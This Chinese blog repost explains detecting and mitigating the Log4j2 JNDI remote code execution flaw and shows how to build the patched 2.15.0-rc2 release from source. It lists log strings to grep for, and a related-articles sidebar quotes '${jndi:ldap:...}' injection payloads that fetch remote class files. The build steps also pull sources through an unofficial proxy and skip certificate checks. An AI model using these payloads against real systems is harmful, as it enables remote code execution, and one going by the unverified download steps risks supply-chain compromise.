Log4j 的远程代码执行漏洞

最新推荐文章于 2024-04-29 00:09:55 发布
最新推荐文章于 2024-04-29 00:09:55 发布
阅读量1k 收藏
点赞数 1
分类专栏: 后端-JAVA 文章标签: java log4j log4j2 安全 apache
原文链接:https://zhuanlan.zhihu.com/p/444128036
版权

Log4j 的远程代码执行漏洞

12 月 10 日凌晨,Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开,由于 Log4j 的广泛使用,该漏洞一旦被攻击者利用会造成严重危害。受本次漏洞影响的版本范围为 Apache Log4j 2.x < 2.15.0-rc2,攻击者可以利用此漏洞在目标服务器上执行任意代码,通过 JNDI 来执行 LDAP 协议来注入一些非法的可执行代码。

攻击检测

(1)可以通过检查日志中是否存在 “jndi:ldap://”、“jndi:rmi” 等字符来发现可能的攻击行为。

(2)检查日志中是否存在相关堆栈报错,堆栈里是否有 JndiLookup、ldapURLContext、getObjectFactoryFromReference 等与 jndi 调用相关的堆栈信息。

官方修补建议

1、排查应用是否引入了 Apache log4j-core Jar 包,若存在依赖引入,且在受影响版本范围内,则可能存在漏洞影响。请尽快升级 Apache Log4j2 所有相关应用到最新的 log4j-2.15.0-rc2 版本,地址 https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

2、升级已知受影响的应用及组件,如 spring-boot-starter-log4j2/Apache Struts2/Apache Solr/Apache Druid/Apache Flink

3、可升级 jdk 版本至 6u211/ 7u201 / 8u191 / 11.0.1 以上,可以在一定 程度上限制 JNDI 等漏洞利用方式。

4、在无法升级版本时,通过修改 jvm 参数、系统环境变量等方式,可在一 定程度上缓解该风险,但无法完全修复,因此不建议通过修改参数的方式解决该风险。

  • 修改 JVM 参数, 设置 -Dlog4j2.formatMsgNoLookups=true
  • 在涉及漏洞的项目的类路径(classpath)下增加 log4j2.component.properties配置文件并增加配置项 log4j2.formatMsgNoLookups=true

5、采用 rasp 对 lookup 的调用进行阻断。

6、采用 waf 对请求流量中的 ${jndi 进行拦截。

log4j-2.15.0-rc1 发布了紧急补丁。

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1

但不久又被发现依然存在新的问题。若是使用 Java 开发语言的系统需要尽快确认是否使用 Apache Log4j 2 插件,并尽快升级到最新的 log4j-2.15.0-rc2 版本。

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

maven 的中央仓库发现这个版本。需要自行编译。

下载地址:https://github.com/apache/logging-log4j2/archive/refs/tags/log4j-2.15.0-rc2.tar.gz

https://gitee.com/apache/logging-log4j2/tags

加速地址:https://shrill-pond-3e81.hunsh.workers.dev/https://github.com/apache/logging-log4j2/archive/refs/tags/log4j-2.15.0-rc2.tar.gz

今天凌晨已经把 log4j-2.15.0-rc2 源代码编译成功,睡了回笼觉,补一下 log4j-2.15.0-rc2 源代码编译过程,分享给大家。

log4j-2.15.0-rc2 源代码编译

使用 docker 编译 log4j-2.15.0-rc2;

docker run -v C:\Users\Lenovo\dock:/opt -it hub.c.163.com/public/centos:7.2.1511 bash

安装 jdk8(略)

安装 apache-maven-3.6.3

cd /opt
wget https://mirrors.ocf.berkeley.edu/apache/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz --no-check-certificate
mkdir /opt/maven
tar -zxvf apache-maven-3.6.3-bin.tar.gz -C /opt/maven

设置环境变量

编辑 vim /etc/profile 文件, 添加下面的命令:

export JAVAHOME=/opt/java/jdk1.8.0311
export MAVENHOME=/opt/maven/apache-maven-3.6.3
export CLASSPATH=.:$JAVAHOME/lib/dt.jar:$JAVAHOME/lib/tools.jar
export PATH=$PATH:$JAVAHOME/bin:$MAVEN_HOME/bin

控制台执行,source /etc/profile

编译源代码

wget https://shrill-pond-3e81.hunsh.workers.dev/https://github.com/apache/logging-log4j2/archive/refs/tags/log4j-2.15.0-rc2.tar.gz
tar -xzvf log4j-2.15.0-rc2.tar.gz
cd /opt/logging-log4j2-log4j-2.15.0-rc2
mvn clean
#(出现问题可以查看问题列表,问题解决后,可以重新执行下面命令验证)
mvn install -Dmaven.test.skip=true

编译成功截图如下:

问题

1、maven-failesafe-plugin:3.0.0-M5

由于 yum 安装的版本比较老,有些项目不能打包,因此需要我们手动安装 apache-maven-3.6 以上版本即可解决。

2、project log4j-api-java9: Cannot find matching toolchain definitions for the following toolchain types:
[ERROR] jdk [ version=’[9, )’ ]

进入子目录,先编译,具体命令如下:

cd log4j-api-java9
cp ../toolchains-sample-linux.xml ../toolchains-sample-linux-9.xml

编辑 toolchains-sample-linux-9.xml,详见下图

mvn clean install -t ../toolchains-sample-linux-9.xml

如果回到项目根目录 cd …,执行命令 mvn install -Dmaven.test.skip=true 依然报该错误,请执行以下命令

cd log4j-api-java9
cp ../toolchains-sample-linux-9.xml ~/.m2/toolchains.xml
cd ..
mvn install -Dmaven.test.skip=true

3、project log4j-perf: Cannot find matching toolchain definitions for the following toolchain types:
[ERROR] jdk [ version=’[11, )’ ]

cp ../toolchains-sample-linux.xml ../toolchains-sample-linux-11.xml

编辑 toolchains-sample-linux-11.xml,详见下图

mvn clean install -t ../toolchains-sample-linux-11.xml

如果回到项目根目录,执行命令 mvn install -Dmaven.test.skip=true 依然报该错误,请执行以下操作;

vim ~/.m2/toolchains.xml 增加以下代码,保存后,回到项目根目录,执行命令 mvn install -Dmaven.test.skip=true 即可。

<toolchain>
  <type>jdk</type>
  <provides>
    <version>11</version>
    <vendor>sun</vendor>
  </provides>
  <configuration>
    <jdkHome>/opt/java/jdk-11.0.13</jdkHome>
  </configuration>
</toolchain>

Log4j出最新版本2.16.0,已推送到maven的中央仓库,是用该版本即可
maven:

<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.16.0</version>
</dependency>

Gradle: implementation group: ‘org.apache.logging.log4j’, name:
‘log4j-core’, version: ‘2.16.0’

— THE END —
【免责声明】图文来自网络,版权归原作者所有。如侵权请联系删除;我们对文中观点保持中立,仅供参考、交流之目的!

本文来自公众号:大技术
原文地址 zhuanlan.zhihu.com

魏老衲
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_log4j漏洞复现
2301_79054215的博客
04-13 1079
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
解决Apache Log4j 远程代码执行漏洞log4j2部分jar
12-10
解决Apache Log4j 远程代码执行漏洞log4j2部分jar,包含log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar
日志框架Log4j
qq_21344887的博客
09-06 203
日志
log4j2远程代码执行漏洞原理及复现
最新发布
m0_57967573的博客
04-29 1474
log4j2 框架下的 lookup 查询服务提供了 {} 字段解析功能,传进去的值会被直接解析。例如 ${java:version} 会被替换为对应的 java 版本。这样如果不对 lookup 的出栈进行限制,就有可能让查询指向任何服务
Log4j 远程代码执行漏洞检测_fofa搜索log4j漏洞(1),2024年最新网络安全编程基础学习
weixin_58085973的博客
04-18 234
代码Log4j 远程代码执行漏洞检测_fofa搜索log4j漏洞(1),2024年最新网络安全编程基础学习。
log4j反序列化远程命令执行以及个人原理理解
weixin_46626737的博客
08-11 314
目录服务是一个特殊的数据库,用来保存描述性的、基于属性的详细信息,支持过滤功能。${jndi:ldap:x.x.x.x/test.class},通过构造的这条恶意函数,发送到log4j,打印到日志中,开始解析{}中的内容,发现是ldap实现的jndi,然后调用lookup。功能去查找x.x.x.x/test.class该文件,然后发现是远程服务器的文件,需要通过codebase去下载该class类,然后下载后,对该class文件进行使用默认的构造器。类似于上一个漏洞的原理。
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 2654
Apache log4jApache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
Log4j2 远程代码执行漏洞(cve-2021-44228)原理剖析
Hi~ 土拨鼠
12-17 6156
文章目录1、JNDI、RMI、LDAP、JNDI注入?Log4j2 rce原理影响版本修复思路 要了解本次Log4j2 rce的原理,首先我们得知道什么是JNDI,什么是JNDI注入,什么是RMI,什么又是LDAP… 本文中只讲原理,具体复现请转至:Log4j2 远程代码执行漏洞(cve-2021-44228)复现(反弹shell) 1、JNDI、RMI、LDAP、JNDI注入? Java Name and Directory Interface:java命名和目录接口 是sun公司提供的一种标准的java
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Apache Log4j 是一个广泛使用的 Java 日志框架,它允许应用...总之,Apache Log4j 远程代码执行漏洞是一个重大安全事件,强调了在软件开发和运维过程中对安全性的重视。及时更新和维护软件库是防止此类漏洞影响的关键。
Apache Log4j2 远程代码执行漏洞检测工具
12-15
针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...
log4j远程执行漏洞,测试源码
12-22
标题提及的是“log4j远程执行漏洞”,这指的是Log4j 2框架中的一个严重安全漏洞,通常称为CVE-2021-44228,也被广泛称为“Log4Shell”漏洞。这个漏洞允许攻击者通过在日志记录语句中注入恶意代码来实现远程代码执行...
logging-log4j2-log4j-2.15.0-rc2.zip maven 资源库
12-31
针对Log4j 2 远程代码执行漏洞,需要用到的升级资源包,适用于maven资源库,包括log4jlog4j-core,log4j-api,log4j-1.2-api,log4j-jpa等全套2.15.0 maven资源库jar包。如果是maven本地仓库使用,需要将zip包解压到maven资源库的/org/apache/logging/log4jlog4j严重漏洞 log4j logging-log4j2-log4j-2.15.0-rc2 log4j-1.2-api-2.15.0.jar log4j-api-2.15.0.jar log4j-core-2.15.0.jar log4j-slf4j-impl-2.15.0.jar log4j-web-2.15.0.jar
log4j-api-2.9.1.jar
12-30
log4j-api-2.9.1.jar log4j-api-2.9.1.jar log4j-api-2.9.1.jar
Apache Log4j 远程代码执行漏洞分析
告白的博客
12-10 5737
0x00 漏洞描述 apache log4j2是全球使用广泛的java日志框架,同时该漏洞还影响很多全球使用量的Top序列的通用开源组件,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响 Apache Log4j组件描述: Apache Log4jApache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架
Log4j远程代码执行漏洞(CVE-2021-44228)漏洞复现
热门推荐
鸥鹭忘机
12-11 1万+
基本信息 漏洞编号:CVE-2021-44228 影响版本:2.x<=2.15.0-rc1 poc地址:https://gitee.com/lcosmos/apache-log4j-poc 在此十分感谢我的寝室长Cosmos提供的poc和技术支持。 原理简述 当log4j打印的日志内容中包含${jndi:ldap://my-ip}时,程序就会通过ldap协议访问my-ip这个地址,然后my-ip就会返回一个包含java代码的class文件的地址,然后程序再通过返回的地址下载class文件并执行漏洞
分析Apache Log4j2 远程代码执行漏洞
ordersyhack
02-04 9147
分析Apache Log4j2 远程代码执行漏洞
【4】Apache Log4j2远程代码执行(2021.12.10)
司徒荆的博客
12-10 1991
Apache Log4j2远程代码执行(2021.12.10)
log4j远程代码执行漏洞
06-01
log4j远程代码执行漏洞是一种安全漏洞,可以允许攻击者远程执行恶意代码。该漏洞影响Apache软件基金会的Java日志库Log4j 2.x版本,并由于其被广泛使用而引起了广泛的关注。 攻击者可以通过精心构造的日志消息来触发...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值